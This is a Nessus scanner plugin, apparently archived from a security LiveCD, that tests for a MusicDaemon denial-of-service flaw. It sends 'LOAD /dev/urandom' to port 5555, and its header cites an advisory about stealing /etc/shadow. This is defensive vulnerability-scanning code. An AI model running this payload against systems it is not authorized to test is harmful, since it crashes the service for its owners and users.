home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / musicd_dos.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  76 lines

  1. #
  2. # This script was written by Noam Rathaus
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6. # From: "cyber talon" <cyber_talon@hotmail.com>
  7. # Subject: MusicDaemon <= 0.0.3 Remote /etc/shadow Stealer / DoS
  8. # Date: 23.8.2004 17:36
  9.  
  10. if(description)
  11. {
  12.  script_id(14353);  
  13.  script_bugtraq_id(11006);
  14.  script_version ("$Revision: 1.1 $");
  15.  
  16.  name["english"] = "Music Daemon Denial of Service";
  17.  script_name(english:name["english"]);
  18.  
  19.  desc["english"] = "
  20. The remote host is running MusicDaemon, a music player running as a server.
  21.  
  22. It is possible to cause the Music Daemon to stop responding to 
  23. requests by causing it to load the /dev/random filename as its track list.
  24.  
  25. An attacker can cause the product to no longer respond to requests.
  26.  
  27. Solution : None at this time
  28. Risk Factor: Medium";
  29.  
  30.  script_description(english:desc["english"]);
  31.  
  32.  summary["english"] = "Music Daemon DoS";
  33.  script_summary(english:summary["english"]);
  34.  
  35.  script_category(ACT_KILL_HOST);
  36.  
  37.  script_copyright(english:"This script is Copyright (C) 2004 Noam Rathaus");
  38.  
  39.  family["english"] = "Remote file access";
  40.  script_family(english:family["english"]);
  41.  
  42.  script_dependencie("find_service2.nasl");
  43.  script_require_ports("Services/musicdaemon", 5555);
  44.  exit(0);
  45. }
  46.  
  47.  
  48. port = get_kb_item("Services/musicdaemon");
  49. if(!port)port = 5555;
  50.  
  51. if (  ! get_port_state(port) ) exit(0);
  52.  
  53. # open a TCP connection
  54. soc = open_sock_tcp(port);
  55. if(!soc) exit(0);
  56.  
  57. recv = recv_line(socket:soc, length: 1024);
  58. if ("Hello" >< recv)
  59. {
  60.  data = string("LOAD /dev/urandom\r\n");
  61.  send(socket:soc, data: data);
  62.  
  63.  data = string("SHOWLIST\r\n");
  64.  send(socket:soc, data: data);
  65.  
  66.  close(soc);
  67.  sleep(5);
  68.  
  69.  soc = open_sock_tcp(port);
  70.  if(!soc) { security_hole(port:port); exit(0); }
  71.  
  72.  recv = recv_line(socket:soc, length: 1024, timeout: 1);
  73.  
  74.  if ("Hello" >!< recv) security_hole(port:port);
  75. }
  76.